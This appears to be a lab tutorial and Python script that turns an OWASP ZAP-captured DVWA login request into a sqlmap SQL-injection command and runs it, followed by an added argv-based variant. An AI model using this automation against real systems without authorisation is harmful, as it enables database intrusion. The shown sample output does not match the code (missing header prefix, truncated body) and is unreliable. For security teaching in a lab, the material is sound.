Below is a screenshot of the OWASP ZAP request pane after it has been configured to show a combined view of the header and the body.
It shows an HTTP POST request captured during the DVWA login. Inside this pane, right-click, hover over Save Raw, then Request, and click All; a save dialog appears. In the directory where you saved the script below, create a folder called "requests" and save the HTTP request in that folder. On Kali you do not need to be root to run this script.
Here is the script that converts the saved POST request into a sqlmap command and, after a key press, executes it:
#!/usr/bin/env python3
import os
import shlex
import sys

# Extra sqlmap options appended to every generated command; edit to taste.
additionalParameters = '--dbms=mysql --level=5 --risk=3'

REQUEST_DIR = 'requests'


def checkDir():
    """Create the 'requests' directory the first time the script runs."""
    if not os.path.exists(REQUEST_DIR):
        print("This must be the first time you have used this script.")
        print()
        print("Creating a directory called 'requests'. This is where")
        print("you can save the web requests you would like formatted")
        print("for sqlmap.")
        print()
        os.makedirs(REQUEST_DIR)


def getFileName():
    """List the saved requests and return the one the user picks, or None."""
    files = sorted(os.listdir(REQUEST_DIR))
    if len(files) == 0:
        print("Inside this directory is another directory called requests.")
        print("Currently this directory is empty, please add to this directory")
        print("the saved web requests that you would like formatted for sqlmap.")
        print()
        print("Example: In OWASP ZAP 2.4 where the web request is located,")
        print("change the display to be combined with the header and the")
        print("body. Then right-click and Save Raw --> Request --> All.")
        print("Then navigate to the requests directory and save it. You")
        print("can save more than one file and then select which one to")
        print("format.")
        print()
        return None
    print("Select which file to format:")
    for count, f in enumerate(files, start=1):
        print(str(count) + ". " + f)
    print()
    fileNum = int(input("$ ")) - 1
    if not 0 <= fileNum < len(files):
        print("Invalid selection.")
        return None
    return files[fileNum]


def parseFilename(fileName):
    """Turn a raw HTTP request saved by ZAP into a sqlmap command line."""
    userAgent = ''
    cookieInfo = ''
    dataInfo = ''
    with open(os.path.join(REQUEST_DIR, fileName), 'r') as file:
        lines = [line.rstrip('\r\n') for line in file]
    # ZAP writes the request line first ("POST http://host/path HTTP/1.1"),
    # then the headers up to the first blank line, then the POST body.
    lineList = lines[0].split(' ')
    requestType = lineList[0]
    url = lineList[1]
    bodyStart = len(lines)
    for index, line in enumerate(lines[1:], start=1):
        if line == '':
            bodyStart = index + 1
            break
        if line.startswith("User-Agent: "):
            userAgent = line[len("User-Agent: "):]
        elif line.startswith("Cookie: "):
            cookieInfo = line[len("Cookie: "):]
    if requestType == 'POST':
        dataInfo = ''.join(lines[bodyStart:])
    # shlex.quote stops cookie or body values from being interpreted by the shell.
    sqlMapString = "sqlmap -u " + shlex.quote(url) + " "
    if requestType == 'POST':
        sqlMapString += "--data=" + shlex.quote(dataInfo) + " "
    if cookieInfo != '':
        sqlMapString += "--cookie=" + shlex.quote(cookieInfo) + " "
    if userAgent != '':
        # sqlmap's --headers option takes "Name: value" entries
        sqlMapString += "--headers=" + shlex.quote("User-Agent: " + userAgent) + " "
    sqlMapString += additionalParameters
    print()
    print("# Additional Parameters of " + additionalParameters)
    print("# These can be modified in the first few lines of the script")
    print()
    print(sqlMapString)
    print()
    return sqlMapString


def executeCommand(c):
    input("Hit any key to execute the above sqlmap command.")
    os.system(c)


def main():
    print()
    print("## SQLMap Format Script")
    checkDir()
    openFilename = getFileName()
    if openFilename is None:
        sys.exit(1)
    sqlmapCommand = parseFilename(openFilename)
    executeCommand(sqlmapCommand)


if __name__ == "__main__":
    main()
After you execute the above script you get the following output:
$ ./sqlmap-tool.py

## SQLMap Format Script
Select which file to format:
1. requests-1678.raw
2. requests-1665.raw
3. requests-1664.raw

$ 1

# Additional Parameters of --dbms=mysql --level=5 --risk=3
# These can be modified in the first few lines of the script

sqlmap -u 'http://127.0.0.1/dvwa/login.php' --data='username=admin&password=password&Login=Log' --cookie='security=high; PHPSESSID=ec135ql5k3j6irk2j0ammp5l94' --headers='Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0' --dbms=mysql --level=5 --risk=3

Hit any key to execute the above sqlmap command.
If you place more than one file in the 'requests' directory, you can choose which one to format, as shown above, and then execute the command with a key press. One item to note is the set of additional parameters (--dbms=mysql --level=5 --risk=3); these can be adjusted by editing the additionalParameters line near the top of the Python script.
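As an added example (not the blog's script), the same conversion written as a pure function that returns an argument list, so the command can be handed to subprocess.run without going through a shell; the sample request, its PHPSESSID and its cookie value are constructed here, and the function also handles GET requests and multi-line bodies.

```python
import shlex
import subprocess

ADDITIONAL_PARAMETERS = ['--dbms=mysql', '--level=5', '--risk=3']


def request_to_sqlmap_argv(raw, extra=ADDITIONAL_PARAMETERS):
    """Build a sqlmap argv list from a raw HTTP request saved by ZAP."""
    # Request line first, headers until the first blank line, then the body.
    lines = raw.replace('\r\n', '\n').split('\n')
    method, url = lines[0].split(' ')[:2]
    headers = {}
    body = ''
    for index, line in enumerate(lines[1:], start=1):
        if line == '':
            body = '\n'.join(lines[index + 1:]).strip()
            break
        name, _, value = line.partition(': ')
        headers[name.lower()] = value
    argv = ['sqlmap', '-u', url]
    if method == 'POST' and body:
        argv.append('--data=' + body)
    if 'cookie' in headers:
        argv.append('--cookie=' + headers['cookie'])
    if 'user-agent' in headers:
        # sqlmap's --headers option expects "Name: value" entries
        argv.append('--headers=User-Agent: ' + headers['user-agent'])
    return argv + list(extra)


def run_sqlmap(argv):
    # A list with no shell means quotes or semicolons in the saved
    # request are passed to sqlmap literally, never to the shell.
    return subprocess.run(argv, check=False).returncode


# Constructed sample in the layout ZAP writes; the cookie value deliberately
# contains a quote and a semicolon to show why quoting matters.
SAMPLE_REQUEST = (
    "POST http://127.0.0.1/dvwa/login.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "Cookie: security=high; PHPSESSID=abc123; note=o'reilly\r\n"
    "\r\n"
    "username=admin&password=password&Login=Login\r\n"
)

if __name__ == "__main__":
    # shlex.join renders the argv as a shell-safe single line for review
    print(shlex.join(request_to_sqlmap_argv(SAMPLE_REQUEST)))
```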